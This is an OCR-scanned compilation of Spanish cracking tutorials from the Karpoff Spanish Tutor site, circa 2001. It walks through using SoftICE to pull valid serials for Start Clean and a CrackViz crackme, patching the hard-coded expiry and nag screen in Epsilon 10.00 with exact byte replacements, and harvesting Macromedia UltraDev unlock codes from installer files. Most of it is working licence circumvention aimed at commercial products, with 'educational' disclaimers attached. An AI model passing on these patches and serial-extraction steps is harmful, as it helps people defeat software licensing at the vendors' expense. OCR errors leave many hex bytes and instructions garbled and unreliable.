registraron una vez, ya no lo pueden hacer, esto es porque el programa crea una llave en el 
registro de windows, para poder repetir el crack, simplemente ejecuten regedit, y borren 
hkey_current_usersoftwarel mira license y hkey_current_userlsoftwarel mirclusername. bueno 
este es el fin de mi segundo tut, no es cosa del otro mundo, pero tampoco es tan paja, asi que 
haganle ganchos y pues sabrán que todo se les facilita. 


disclaimer: este documento fue escrito con fin educacional, por lo tanto, el autor no se 
responsabiliza de las acciones tomadas por terceros, ya que la información no es ningun 
delito. 
no knowledge that is no power 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


Como Crackear Start Clean v1.2 


INTRODUCCION 


. tag!!! 


. qué onda raza!!! pues los saluda su amigo "[glole[e]?, si el de las traducciones, o 
como dice karpoff andrik, pues está vez no os traigo ninguna traducción sino mi 
primer tutorial, este es uno de los objetivos mas viejos que hay, pero es eficiente para 
empezar nuestra carrera, no es una gran cosa como mucho podrán pensar, es mucho 
mas paja de lo que piensan (perdon si hay cosas que no entienden, si algo no queda 
claro, escribanme y tratare de explicarlo bien, ya que no tengo mucha experiencia 
escribiendo tutoriales y mi forma de hablar es muy diferente, asi que tratare de no 
usar muchas expresiones de mi natal guatemala). 

. Okillas, este es mi primer tutorial, con esto kiero empezar a ayudar al surgimiento de 
una nueva generación. este tut es dedicado a k4r1, ke aunke no tiene nada ke ver con 


todo esto, pues es mi novia. 
let's work, digo, 
trabajemos 


contenido : 


O)descarga del programa. 


1)reconociendo al enemigo 


2)herramientas 


3)comienza la acción 


3)despedida 


1)reconociendo al enemigo 


. Okas, antes de comenzar dejenme decirles que esto del crackin' no es para que la raza vea que 
eres k3w1 o que eres algo fuera de lo común, aunque si lo eres, no vas a andar flamenado a los 
wannabes. sería grandioso que tomaras en cuenta que tienes mucho que hacer, como por ejemplo 
aprender assembler, no te digo que tienes que dominarlo a la perfección, pero que sí sería de gran 
ayuda (te recomiendo las lecciones de iczelion), aunque en este tut no te será necesario, ya que 
trato de hacerlo lo mas fácil y entendible que puedo. familiarizate con soft ice (sice, si, etc), si no 
sabes que teclas presionar, te lo diré, yo uso el winice.dat de la página de the sandman, encuentralo 
en su página, encontrarás el link en la página de karpoff, y si no lo encuentrás pidemelo, ke te lo 


enviare. 
. Okas, el reconocimiento que debemos hacer es el de iniciar el programa, y al hacerlo verás lo 
siguiente: 


Okas, ahora lo que tenemos que hacer es un click en el boton register, y verémos esto: 


ingresa algo en los campos, en el campo name yo ingresé tanso y en el otro 031199 (la fecha en 
k4r1 me dió el sí, tu puedes elegir lo que kieras) y obtienes un molesto mensaje que dice incorrect 
code! y bueno, ahora sabes como es que se comporta nuestro programa. 

. bueno no está demas decir que yo no le encontre ninguna utilidad a este programa. 


2) herramientas 


unicamente usaremos una herramienta, es nuestro amado soft ice (por cierto, para familiarizarte 
mas con él, leer los tuts que hay, si no estoy mal ya traduje uno, y hay uno bueno rondando por 
alli, y es el de black fenix). 


3)comienza la acción 


okas, ahora que ya sabes que es lo que hace el programa, estarás ansioso por empezar a 
crackearlo, así que no te repetiré que si te gusta el programa y despues de crackearlo kieres seguir 
usandolo, seria bueno que pagaras por él, hay gente que necesita vivir, ademas no tenemos que 
andar de lammers por allí, entendido? okas, ahora sí acción!. 

ahora ingresa tus datos, de nuevo (si cerraste el programa, aunke no creo que seas tan douh!!!) y 
antes de presionar el botón ok, presionas ctrl+d (la combinación control d), esto invokará al soft ice 
notaras que no puedes usar windows, esto es poke nuestro sice ha tomado el control de todos los 
procesos que se están llevado a cabo, entonces fijas varios breakpoints (si eres demasiado newbie, 
puedes leer los tuts de dek_oin para más info), para nuestros fines, fijaremos 3 bp, estos serán: 


| bpx getwindowtexta 


| bpx getdlgitemint 


bpx getdlgitemtexta 


lo anterior es la forma en que le decimos a sice que detenga todo proceso que utilice las apis 
indicadas, es decir, que si el programa que estamos crackeando usa alguna de esas funciones, 
automaticamente se detendrá la ejecución de modo que podamos obtener nuestro s/n valido. 

el bpx significa breakpoint on execution, en español breakpoint sobre ejecución, utilizamos esas 3 
funciones porque son las mas usadas para tomar el texto de los campos de texto en los 
programas, aunque hay muchas mas. 

okas, ahora presionad de nuevo ctrl+d y regresas a windows, ahora ya puedes presionar el botón 
ok. sice aparecerá, en este momento deberás presionar f11, esto para que soft ¡ce nos muestre el 
código del programa que está siendo crackeado, en este caso start clean. recuerdas que en la 
ventanita de registro habia 2 campos, bueno, al parecer ahora está rastreando el campo del 
nombre, así ke no nos importa, lo que si nos interesa es que nuestro amado start clean lo utiliza 
para generar nuestro s/n, así que presionas f5 y.... oh!!!! sorpresa, sice regresó! esto nos indica 
que sí podemos (y debemos) seguir rastreando el + que ingresamos. 

bueno, te preguntaras, y ahora que diablos voy a hacer? tranquilo, no comas ansias, todo a su 
tiempo, recuerdas el dicho? despacio porke precisa, asi que lo que nos queda hacer, es ver y 
analizar el siguiente fragmento de asm: 


:004011c5 ffd6 Call esi 


:004011c7 6830604000 
:004011cc 6830614000 
:004011d1 eB8aa000000 
:004011d6 8d442418 
:004011da 83c408 
:004011dd 50 

:004011de 6830604000 
:004011e3 £f£f1520924000 
:004011e9 85c0 
:004011eb 0f£8580000000 


push 00406030 

push 00406130 

call 00401280 

lea eax, dword ptr [esp+18] 

add esp, 00000008 

push eax 

push 00406030 

call dword ptr [kernel32!lstrcmpal 
test eax, eax 

jne 00401271 


bueno, seguro ahora debes estar preguntandote que pasa, dejame comentarte que esto nos dice 
que el programa toma el s/n que ingresamos, y lo compara con el verdadero, el clavo o 
problema, es saber donde es que esto ocurre. 


okas, entonces analicemos este código para ver que encontramos, vemos que aparece call 
dword ptr [kernel32!lstrecmpal, lugar donde son puestos los valores que seran comparados en 
el test eax, eax. la instrucción ¡ne 00401271 unicamente es para que si el código ingresado no 
es válido, nos muestre el mensaje de error. 


hmmm, suena algo difícil, pero es mas paja que nada, en la practica, hacemos lo siguiente: debes 
estar dentro de sice, siguiendo el s/n ingresado. presionas f10 (este es el botón de rastreo, esto 
nos permite ejecutar el programa línea por línea, muy útil). continuas presionandola, hasta que la 
línea que contiene Istrempa quede resaltada. 


en este punto, escribes "d eax" (sin las comillas, d significa dump, en español es descargar o 
mostrar al usuario) para que te muestre el contenido del registro eax. y ahora lo que ves, no es 
nada más ni nada menos que el "031199". huh, vamos por buen camino, si en este punto te 
sientes cansado, y no kieres mas, pues que poca paciencia tienes, mejor dedicate a otra cosa, o 
juega un poco, así como yo, cuando me aburro, juego mortal kombat trilogy v. pc, ejeje, es lo 
mejor. 

okas, os decía que vamos por buen camino, casí a punto de acabar este tut, así que manos a la 
ubre, digo a la obra, lo que tenemos que hacer ahora, es encontrar nuestro s/n válido, pero 
como? no se desesperen, recuerdan las primeras lineas de código del fragmento que están 
arribita? si no, veanla, y se darán cuenta que hay 2 direcciones que son empujadas al principio, 
bueno, veamos los contenidos de estás direcciones, comencemos por la segunda (según la lógica, 
en esta dirección deberíamos encontrar lo que estamos buscando), escribimos "d 406130" y lo 
que encontramos es "tanso", damnit, en está dirección está nuestro nombre, así que probemos la 
primera, "d 406030" y encontramos un número raro: "1012-9166-1739-345", están pensando lo 
mismo que yo? creo que sí, me parece que ese es el número que buscamos, así que escribanlo o 
memoricenlo, y salgan de sice. 


bueno, ahora que estamos de vuelta en windows (diganme si no se siente bien regresar al 
entorno gráfico y al manejo de lo conocido?), vamos a nuestro programita, e ingresamos el 
código que necesitamos, y nos encontramos con esto 


Register! 


Ifyou intend to use Start Clean 
for more than 30 days, you must register. 


send a che E 
addres: 
Name: 


[TansO 


Code: 


hi 012-9166-1739-345 


On Compuserw Lancel | 
OK | Register... | 


ahora presionamos enter o el botón ok, y......... 


your name, 
berto: 


registration ID: 


ÉS Start Clean 


Start Clean v1.2 
Copyright € 1996 Firas El-Hasan 


Registered to TaNsO 
+ Include files on: 7 Bptions: 
Removable drives(CD, floppy, etc.] Delete empty folders 
TT” Network drives FT Minimize while cleaning | 


FT Nonexistent / Disconnected net drives Exit after cleaning 
T Windows Desktop 


1 Cava Í Í 


4)despedida 


bueno raza, esto es todo por esta vez, es más dificil de lo que esperaba esto de escribir 
tutoriales, pero bien vale la pena, tuve algunos problemas a la hora de completar esto, pero es el 
problema de usar varios winice.dat, asi que no os preocupeis. por cierto, saludos a todos los 
amigos, karpoff, dek_oin, black fenix, etc. a mi amada kari, y a spencer (estos 2 ultimos na de na 
con el underground, pero son de lo mejor) orale gente. si me quieren contactar, mi email es 
goleeuvOhotmail.com pd. se me olvidaba decirles, si kieren repetir el crack, se darán cuenta que si lo 
registraron una vez, ya no lo pueden hacer, esto es porque el programa crea una llave en el 
registro de windows, para poder repetir el crack, simplemente ejecuten regedit, y borren 
hkey_current_usen softwarelstart clean. 


disclaimer: este documento fue escrito con fin educacional, por lo tanto, el autor no se 
responsabiliza de las acciones tomadas por terceros, ya que la información no es 
ningun delito. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Crackme de CrackViz, vencido!!! 


INTRODUCCION 


TAG!!! 


Qué onda raza!!! de nuevo aca su amigo “[G]oLe[E]”, pues esta vez me dije a mi 
mismo: "Mi mismo, habiendo tanto crackme en la página de Karpoff (que valga la 
propa) poke no crackeamos uno". 

Y bueno, me decidí a crackearlo, y como saben, nunca se deja de aprender, lei un 
manual muy bueno acerca de como cachar s/n con la función hmemcpy, así ke lo 
intente, el crackme fue el de crackviz, y os presento la forma de crackearlo en unos 
minutos, dependiendo de la velocidad de tu compu y de tus manos y ojos. :oP. 

Okas, también se me olvidaba decirles que he escrito este tut unos minutos después 
que mi ekipo, el ReAl mAdRIiD venció 3-2 a la Lazzio (02/13/2001), lo cual me dió un 
poco más de animo. KaRi I|cH LiEbE DiCh. 


Let's Work, digo, 
Trabajemos 


Contenido : 


1)Reconociendo al enemigo 


2)Herramientas 


3)Comienza la Acción 


4)Despedida 


1)Reconociendo al Enemigo 


Okas, como ya todos deben saber, lo mejor a la hora de crackear algo, es saber como se 
comporta ante determinadas situaciones (sorry, este tu no tendrá fotos), y bueno, al 
conseguir el crackme, hacemos correr CrkMeViz.exe, una pequeña ventana, con un menu 
Archivo, abrimos el menú, hacemos click en registrar, nos aparece una ventanita pidiendonos 
el 4 para registrarnos, ingresamos el ya conocido 031199. 

Hmmmmmmm!! nos aparece una ventana que dice Numero de Serie Incorrecto; click en 
aceptar, y se cierra la ventanita, dejandonos en la ventana principal del programa. 
Okas, suficiente del comportamiento de nuestro enemigo, acaba de preparar su muerte!!!. 


2) HERRAMIENTAS 


Unicamente usaremos una herramienta, es nuestro amado Soft |CE, eje je, ya se habrán dado 


cuenta, con el SICE hacemos mucho!!!!, lápiz y papel, si no tienes memoria suficiente o tu 
ventana de comando y ventana de datos son muy pekeñas. 


3)Manos a la Ubre, Digo a la obra 


Well, its time to start workin' (opss, sorry, se me olvida que no estoy en gringolandia). 
Bueno, es hora de empezar a trabajar, Abre el programa y ve al dialogo de registro, ingresa 
031199 (o lo que quieras) y NO PRESIONES EL BOTÓN DE REGISTRO!!!!, en su lugar presiona 
CTRL D para abrir SICE, pon un bpx para Hmemcpy así: 


bpx Hmemcpy | 


Ahora salimos de Softl CE con F5 y presionamos 
Registrar (o ALT R para los que no nos gusta usar mucho 
el mouse). 

Ahora debería aparecer SICE debido a la utilización de 
Hmemcpy, y EuReKa, lo hizo, hmmmm, ahora tenemos 
que llegar al código del programa, porque dejenme 
contarles que donde aparecimos no es el código del 
programa, si no que el código de Windows, Oks, ahora 
debemos presionar F10 muchas veces, hasta que en el 
"título" de la ventana de código veamos algo como 
"MSVBVM50!text+C9E7", generalmente lo encontrarás 
después de ver "KERNEL32!_FREQASM+04D7" en ese 
lugar. 


Cuando llegues a este lugar, presiona ALT F4 (asumo 
que estás usando el WINICE.DAT de Sandman, disponible 
en su página, o pidemelo) lo cual es una gran ayuda a la 
hora de crackear programas VB. Cuando lo hagas, veras 
en la ventana de datos una linea que dice: "Patern found 
Dl) HHHH: HHHAFRAAARE" (lo pongo así poke las 
direcciones podrian diferir). 


A esta altura, debemos eliminar el breakpoint que 
habiamos fijado para hmemcpy, y fijar uno para la 
dirección que nos dío como resultado el paso anterior 
(Dpx HAHAHAHA) Lo anterior debes hacerlo sin 
salir del SoftlCE, para evitar recibir el mensajito de 
numero incorrecto, pero si eres as DoUh!! as ¡ think, que 
otra, pero bueno, al fijar el bpx, presiona F5 y SICE 
aparecerá de nuevo (eso espero) justo en la dirección 
para la que fijaste el bpx, verás un código parecido a 


este: 

016F:7979D9E7 RET 0004 
016F:7979D9EA PUSH ESI 
016F:7979D9EB PUSH EDI 
016F:7979D9EC MOV EDI, [ESP+10] 
016F:7979D9FO MOV ESI, [ESP+0C] 
016F:7979D9F4 MOV ECX, [ESP+14] 
016F:7979D9F8 XOR EAX, EAX 
016F:7979D9FA REPZ CMPSW 
016F:7979D9FD JZ 7979DA04 
016F:7979D9FF SBB EAX, EAX 


Oks, con el bp que fijaste, apareces en la línea resaltada 
en azul, escribes d esi para ver el contenido de esi, y es 
basura, lo mismo para edi presiona, presiona F10 hasta 
que la linéa 016F: 7979D9F4 MOV ECX,[ESP+14] este 
resaltada, aca escribres: "d ecx" y Voila!! 
encontramos el + de serie por lo que parece, tomamos 
nota del mismo, limpiamos breakpoints (bc *), y salimos 
de Softl CE con F5. 


Hmmm, volvemos a abrir la ventana de registro, 
ingresamos nuestro + de serie y EXITO TOTAL. 
Eso es todo, así de fácil. 


4)Despedida 


Bueno Raza, esto es todo por esta vez, que viva el Foot 
Ball, ejo, el Real, los Rojos, y mi Novia. Por cierto, 
saludos a todos los amigos, Karpoff, Dek_Oin, Black 
Fenix, etc. Si me quieren contactar, mi email es 

goleeuvC hotmail.com PD. Ya Basta de Gente tonta que se 
roba los tuts, porfa, no hay que ser, si tanta es la cosa, 
pidan permiso a los escritores para publicar los tuts. KaRi, 
ich liebe dich 


Disclaimer: este documento fue escrito con 
propositos educacionales, debido a que la 
información es un derecho. No me hago 
responsable por lo que puedas y quieras hacer con 
la info aquí presentada. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 
Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 
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Programa: Epsilon 10.00 


PROTECCION: Límit Temporal Hard-Coded 
Descripcion: Editor 
Dificultad: Newbie 


DOWNLOAD: http://www. lugaru.cony 


Herramientas: Softice, Editor Hexadecimal (el que más os guste) 


KuaTo_ThoR 12/02/2001 


INTRODUCCION 


Muy buenas a Todos amigos. En este programa veremos un buen ejemplo de lo que se denomina Límite 
Temporal Hard-Coded (HC), que suena como si fuese muy jodido, pero no lo es, al menos en este programa, 
desde luego los hay más jodidos. 


Este tipo de protección, se diferencia del típico programa de límite 30 dias, o los que sean, básicamente en 
que la fecha de fin de evaluación del programa viene prefijada, codificada en el propio programa. No depende 
del dia en el que comencemos la evaluación. Por tanto el método general de actuación de estos programas, 
será básicamente, mirar la fecha del sistema, comprobarla con la fecha límite establecida, y si nos hemos 
pasado, ya no funciona el programa. 


AL ATAKE 


Preliminares. Obtener Información 


Lo primero como siempre es saber de que va el tema. Ejecutamos el programa, y nos aparece una ventana, con lo siguiente: 


This copy of Epsilon will expire soon 


A 


[HA 


Mmmm... el programa expira el 1 Marzo de 2001, de aqui deducimos que estamos ante una protección HC. Analizamos el 
archivo ejecutable, epsilon.exe, con el File InsPEctor, con el Language 2000, o con el que más nos guste, y nos dice que el 
archivo no esta empaquetado y que está hecho en Visual C++. Perfecto. 


AL ATAKE 


Bien, ponemos a punto Sice, listo para el ataque... 


Puesto que lo que nos interesa es la comparación temporal, antes de arrancar el programa, vamos a Sice (Ctrl+D) y ponemos 
un par de breakpoints, concretamente bpx GetSystemTime y bpx GetLocalTime. Ahora sí, salimos de Sice (F5) y 
arrancamos Epsion. Salta Sice (GetSystemTime), pulsamos F5, vuelve a saltar Sice (GetLocalTime), y volvemos a pulsar F5, 
ya ha arrancado el programa, y no ha vuelto a romper Sice. Por tanto, una de esos dos sitios es el que nos interesa. Si os 
habéis dado cuenta, la segunda vez ya había aparecido la ventana del programa, pero aún no la nag inicial. Por tanto nos 
centraremos en la segunda llamada. 


Volvemos a arrancar el programa, y en la segunda ruptura de Sice, pulsamos F12 (una vez) hasta que aparecemos en 
nuestro programa, concretamente aparecemos aquí: 


:00431478 50 push eax 


* Reference To: KERNEL32.GetLocalTime, Ord: 00E2h 


| 

:00431479 FF1530C64500 Call dword ptr [0045C630] 

:0043147F 668B4C2404 mov cx, word ptr [esp+04] <- Aquí aparecemos. 
:00431484 8B 742418 mov esi, dword ptr [esp+18] 

:00431488 66890E mov word ptr [esi], cx 

:0043148B 668B4C2406 mov cx, word ptr [esp+06] 

:00431490 66894E02 mov word ptr [esi+02], cx 


:004314D0 6689460E mov word ptr [esi+0El], ax 
:004314D4 5E pop esi 

:004314D5 83C410 add esp, 00000010 

:004314D8 G3 ret <- Fin de la llamada que nos trajo aquí. 


Podemos ver que no hay ninguna comparación en el trozo completo de códgio, ni nada interesante, por tanto vamos hasta el 
Ret, pata volver a la llamada que nos trajo aquí: 


:00420C38 E833080100 call 00431470 <- Esta llamada es la del GetLocal Time 
:00420C3D 0FBF442404 movsx eax, word ptr [esp+04] <- Interesante. ?eax = año 
:00420C42 OFBF4C2406 movsx ecx, word ptr [esp+06] <- Interesante. ?ecx = mes 
:00420C47 0FBF542408 movsx edx, word ptr [esp+08] <- Interesante. ?edx = dia 
:00420C4C 83C404 add esp, 00000004 

:00420C4F 6A01 push 00000001 


:00420C51 50 push eax 

:00420C52 51 push ecx 

:00420C53 52 push edx 

:00420C54 6884E34400 push 0044E384 

:00420C59 E852FEFFFF call 00420AB0O <- Una llamada que podría ser interesante. 
:00420C5E 830424 add esp, 00000024 

:00420C61 C3 ret <- Salimos de aquí. 


Podemos ver en los valores de eax,ecx y edx al principio, nuestra fecha de hoy (en valores hexadecimales), sin duda 
interesante :). Una vez que llegamos a la llamada en 00420C59, nos metemos dentro de ella (F8): 


:00420AC5 A304474500 mov dword ptr [00454704], eax 

:00420ACA 56 push esi 

:00420ACB E8DO000000 call 00420BAO <- Una llamada, realmente interesante. 
:00420ADO 83C40C add esp, OOOOODOC 

:00420AD3 85C0 test eax, eax 

:00420AD5 7511 ¡ne 00420AE8 <- Una salto condicional. 

:00420AD7 53 push ebx 

:00420AD8 57 push edi 


Tenemos una llamada, seguida de un salto condicional, vamos a entrar a ver que hay por ahí: 


:00420BAO 8B44240C mov eax, dword ptr [esp+0C] <- Aquí comienza la llamada. eax=año 

:00420BA4 3DD1070000 cmp eax, 000007D1 <- eax contenia el valor del año. Lo compara con 7D1 = 2001. 
:00420BA9 7D03 jge 00420BAE <- Saltamos si es mayor o igual. 

:00420BAB 33C0 xor eax, eax 

:00420BAD C3 ret 


:00420BAE 7518 jne 00420BC8 <- Si no es igual, es que es mayor, y si es mayor se termino la evaluación. 
:00420BBO 8B442408 mov eax, dword ptr [esp+08] <- eax = mes 

:00420BB4 83F803 cmp eax, 00000003 <- 3 = Marzo 

:00420BB7 7D03 jge 00420BBC <- Igual que antes 

:00420BB9 33C0 xor eax, eax 

:00420BBB C3 ret 


:00420BBC 750A jne 00420BC8 <- Vamos a FIN de eval. 

:00420BBE 837C240401 cmp dword ptr [esp+04], 00000001 <- 1 = Dia 1 
:00420BC3 7D03 ¡ge 00420BC8 

:00420BC5 33C0 xor eax, eax 

:00420BC7 C3 ret 


:00420BC8 B801000000 mov eax, 00000001 <- Si nos hemos pasado en la evaluación, venimos aquí. 
:00420BCD C3 ret 


Más claro no nos lo podían haber puesto. En resumen, si estamos aún en periodo de evaluación, pone eax a cero, y si nos 
hemos pasado, la pone a 1. Por tanto con sustituir la llamada que nos traía aquí por un 'mov eax, 0', el programa no 
expirará jamás. También podemos sustituir el valor del año, en lugar de "7D1' poner 'BB8', por ejemplo (hasta el año 3000 
tenemos tiempo de sobra para evaluarlo :). 


Aún tendremos la nag inicial. Por tanto una vez hemos regresado de esta llamada (os recuerdo estaba en 00420ACB), 
vemos esto: 


:00420ACB E8D0O000000 call 00420BAO <- La llamada de las comparaciones 
:00420ADO 83C40C add esp, OOOOO0OC 

:00420AD3 85C0 test eax, eax 

:00420AD5 7511 ¡ne 00420AE8 <- Si fuese eax<>0 saltaríamos. 
:00420AD7 53 push ebx 

:00420AD8 57 push edi 

:00420AD9 56 push esi 

:00420ADA E8F1000000 call 00420BDO <- Esta llamada nos saca la nag inicial. 
:00420ADF 83C40C add esp, OODOOOOC 

:00420AE2 33C0 xor eax, eax 

:00420AF4 5F pop edi 

:00420AE5 5E pop esi 

:00420AE6 5B pop ebx 


:00420AE7 C3 ret 


Ahí en esa última llamada, nos aparece la nag inicial, sólo hay que nopearla (5 nops) o podéis poner cualquier otra cosa para 
rellenar, eso sí, que ocupe los cinco bytes del call. 


En resumen: 

- En 420ACB sustituimos el Call 00420BA0 (E8DO000000) por un mov eax, O (B800000000) 

- En 420ADA sustituimos el Call 0042BDO (E8F1000000) por cualquier cosa, por ejemplo por mov eax, O (B800000000). 
Ya sólo queda ir al editor hexa y realizar los cambios. Los offsets os lo dejo a vosotros. 


Además en el menú About, nos sigue apareciendo que nos expira el 1 Marzo de 2001. Con el Exescope podemos hacer que 
nos quede así: (sólo hay que cambiar el largo de la ventana ABOUTEVALBOX) 


About Epsilon 


FINALIZANDO 


Bueno esto ha sido todo por esta vez, espero no haberme equivocado mucho, si encontráis cualquier error, o tenéis alguna 
pregunta no dudéis en decírmelo. Espero que os haya resultado útil este tute. No olvidéis que nuestro objetivo sólo es 
aprender. Sin contar con la diversión que esto supone por supuesto ;-)) 


Un Gran Saludo para todos los miembros de [K-FoR], para los amigos de Tutoriales 2000 y para todos vosotros. En especial 
para Profesor X, que me proporciono el programa, como siempre :-) 


Hasta la próxima... 
«»— "== kz on oí o» 


Mi correo: kuato thortdhotmail.com 


La página de [K-FoR]: http://pagina. de/kfor 


« » === z=z* zar a » 


' Bien parece que no estás cursado en esto de las aventuras: ellos son gigantes; y si tienes miedo, quítate de ahí, y 
ponte en oración en el espacio que yo voy a entrar con ellos en fiera y desigual batalla. 


Non fuyades, cobardes y viles criaturas; que un sólo caballero es el que os acomete. 


” 
. 


El Ingenioso Hidalgo Don Quijote de la Mancha 


Miguel de Cervantes Saavedra 


Karpoff Spanish Tutor: Pagina dedicada a la dibulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 
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MACROMEDIA DREAMWEAVER ULTRADEV versión Tryout. 
(Ampliación de MACROMEDIA PRODUCTS) 


PROTECCION: Alguna versión de Sales Agent. 

Objetivo: Buscar el Código que desbloquea el programa. 

Descripcion: Un nuevo regalo de Macromedia. 

Dificultad: Novato. 

DOWNLOAD: http: //www.macromedia.com/support/ultradev 

Herramientas: Softice 3.24, W32Dasm 8.9, Antivirus actualizado. 

CRACKER: Arkanian. FECHA: 15/02/2001 


INTRODUCCION 


No espabilan, se les ha advertido por activa y por pasiva, y no espabilan, ellos sabrán lo que hacen y porqué 
lo hacen. Remito a la gente interesada a mi ensayo anterior acerca de los Productos Macromedia , ¡¡¡de hace 


seis meses!!!, lo poco que han cambiado las cosas después de todo este tiempo, más de lo mismo, ni siquiera 
han cambiado la versión de Sales Agent, sigue siendo la 3.1.2, estoy bastante decepcionado, esperaba 
encontrar otra cosa, algo más complicado o un nuevo sistema de protección, en fin, no se puede tener todo lo 
que se quiere... 


Así que espero que este ensayo valga como una actualización del anterior. He comprobado que TODOS los 
programas de Macromedia de tipo Tryout se pueden reventar así. (Excepto Authorware y Director que, una 
vez liquidado Sales Agent, hay que buscar el número de serie con SoftICE, pero esto ya es otra historia). 


Aquí tenemos lo último de Macromedia ”...orientado al desarrollo de aplicaciones dinámicas basadas en 
bases de datos a traves de internet. Las versiones de la plataforma incluyen el nuevo Fireworks 4, que ofrece 
al usuario toda la libertad creativa necesaria para la creación y manipulación de gráficos web, permitiendo 
realizar menús desplegables y animaciones de tipo rollover". ¡Toma ya!..., ¿Qué coño son "animaciones 
rollover"? 


Dejemonos de las palabras grandilocuentes de la publicidad y vamos a echar un vistazo al lugar y a la forma 
en la que se genera el Serial para desbloquear la versión Tryout que nos limita el tiempo de uso a 30 días. 


Si te has comprado un manual o un libro sobre cualquier producto de Macromedia que viene con un CD con 
el programa de prueba y quieres aprender algo más, este ensayo es para ti. 


AL ATAKE 


Instalamos el programa , SoftICE NO debe estar activado, cuando aparezca la primera ventana de la instalación, 
abrimos una ventana MS-DOS, ejecutamos el viejo EDIT y directamente vamos a abrir el archivo 
CriWindowsaTempl istmp1.dirl_ istmp0.diriserializationud10.dll, buscamos la cadena Registration y apuntamos 
los diversos Números de Serie que amablemente no proporcionan. 


Tenemos ya un montón de Números de Serie de unos cuantos programas de Macromedia, si no he contado mal son 
exactamente 9 Números validos para programas como Dreamweaver versiones 1, 2 y 3, Dreamweaver UltraDev, 
Drumbeat 2000 E-commerce Edition y Java Server Pages Edition, Fireworks versiones 2 y 3 y un par de números que 
empiezan por BDJ100-... y por BDA100-..., que exactamente no se a que programas corresponden pero que prometo 
averiguar a la mayor brevedad posible. Pues si que biene completito el archivo de marras... 


De todas formas, una vez acabada la instalación, se puede ejecutar Regedit y en el registro del Windows, en 
HKEY_LOCAL_MACHINEISSOFTWAREWMacromediaWDreamweaver UltradevX Registration está el número 
que estamos buscando. (La X es el número de versión del programa). 


¿Por qué el programa se instala automáticamente con su número de Serie? Pues porque el programa original lo necesita 
para poder instalarse. Imaginate que tienes el programa original, que te ha costado una pasta gansa, para instalarlo 
tienes que poner el Número de Serie en alguna ventana, ¿no?, bueno pues la "protección" de Sales Agent se basa en lo 
siguiente: 


- Coge el exe o los exe's originales, UltraDev.exe en este caso, encripta la sección .text y lo renombra 
como UltraDev.tty. 

- Crea un ejecutable con el mismo nombre que el original pero de muchicimo menor tamaño cuya 
función es iniciar el programa, por supuesto, para acto seguido llamar a la libreria rsagnt32.tty que es la 
que se encarga de desencriptar el ejecutable principal en memoria, controlar el tiempo de uso del 
programa y proporcionar la intefaz esa del Buy Now, Try, etc... 

- En resumen, Sales Agent envuelve al programa en una especie de "caparazón" y limita su uso a X días, 
pero para que el programa pueda funcionar durante ese intervalo de tiempo NECESITA estar registrado 
de antemano. Por eso aparece el número que necesitamos en el Registro. 


Estos son los archivos interesantes: 


Select File to Disassemble 


Buscar en: | Dreamweaver UltaDev +] E] [es] es] sE 


rsagnt32 ty. 276KB Archivo TTY 
lan] UlttaDew Uninst.isu 1543KB Archivo ISU 11, 
to UltaDev 208KB Aplicación 13, 
ls] UltraDev.tty 5.656KB Archivo TTY 21, 
la] Ultrapop. tty 168KB Archivo TTY 27. 
la] Ultratky.tty 145KB Archivo TTY 135 


4 » 
Nombre de archivo: [tsagnt32 
Tipo de archivos: E Files[*.*] +] Cancelar 

LZ 


No adelantemos acontecimientos, así que acabamos la instalación (pedirá reiniciar el ordenador), iniciamos el 
programa, liquidamos el archivo que el antivirus detecta como "peligroso", encendemos un cigarro y dos minutos 
después, cuando salte el antivirus, volvemos a darle matarile al dichoso archivo. Nos registramos adecuadamente 
(botón de Buy Now) escogiendo las opciones Go off line y Mail/Fax en sus correspondientes ventanas y reiniciamos 
el cacharro esta vez ACTIVANDO SoftICE. 


Cargamos el programa en el Loader del Sice, esto es importante, hay que iniciarlo a traves del Symbol Loader si no la 
cosa se complica, prueba a ejecutar el programa normalmente y veras porqué. Cuando rompa en el PEP (Program 


Entry Point) le metemos un bpx GetDlgltemTextA, salimos con Crtl+D, vamos a Buy Now, rellenamos el Unlocking 
Code con lo de siempre y empezamos. 


Complete Mail/Fax Payment 


2 JARKANIAN 


e [1234567890 | 


EMPIEZA LA DIVERSION 
Rompemos con SoftICE y aterrizamos después de un F11 en el siguiente código, estamos dentro de Rsagnt32.tty: 


* Reference To: USER32.GetDlgltemTextA, Ord:0104h 

| 

:10006201 FF1578320210 Call dword ptr [10023278] 

:10006207 BF54FC0310 mov edi, 1003FC54 --> Aterrizamos aquí. Mueve nuestro Serial a EDI. 
:1000620C 83C9FF or ecx, FFFEFFFF 

:1000620F 33C0 xor eax, eax 

:10006211 F2 repnz --> Coge Nuestro serial que 

:10006212 AE scasb --> está en ES:EDI 

:10006213 F7D1 not ecx --> ECX hace de contador. 

:10006215 49 dec ecx 

:10006216 83F90A cmp ecx, 0000000A --> Lo compara con 10 caracteres 
:10006219 7455 je 10006270 --> Saltando que es gerundio... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:10006219(C) 


| 

:10006270 E88BB3FFFF call 10001600 --> Aquí caemos... 

:10006275 8D953CFFFFFF lea edx, dword ptr [ebp+FFFEFF3C] --> Dirección para PERSONAL CODE. 
:1000627B BF48FC0310 mov edi, 1003FC48 -->»PERSONAL CODE en EDI. 
:10006280 83C9FF or ecx, FFFFFFFF 

:10006283 33C0 xor eax, eax 

:10006285 F2 repnz 

:10006286 AE scasb --> Aquí lo pilla. 

:10006287 F7D1 not ecx 

:10006289 2BF9 sub edi, ecx 

:1000628B 8BC1 mov eax, ecx 

:1000628D 8BF7 mov esi, edi --> Lo mismo en ESI. 

:1000628F 8BFA mov edi, edx 

:10006291 C1E902 shr ecx, 02 

:10006294 F3 repz 

:10006295 A5 movsd --> Otra vez en doble. 


:10006296 8BC8 mov ecx, eax 

:10006298 83E103 and ecx, 00000003 

:1000629B F3 repz 

:1000629C A4 movsb --> Los dos bytes que nos faltan. 

:1000629D 8D8D70FFFFFF lea ecx, dword ptr [ebp+FFEFFF70] --> Dirección para el Serial. 
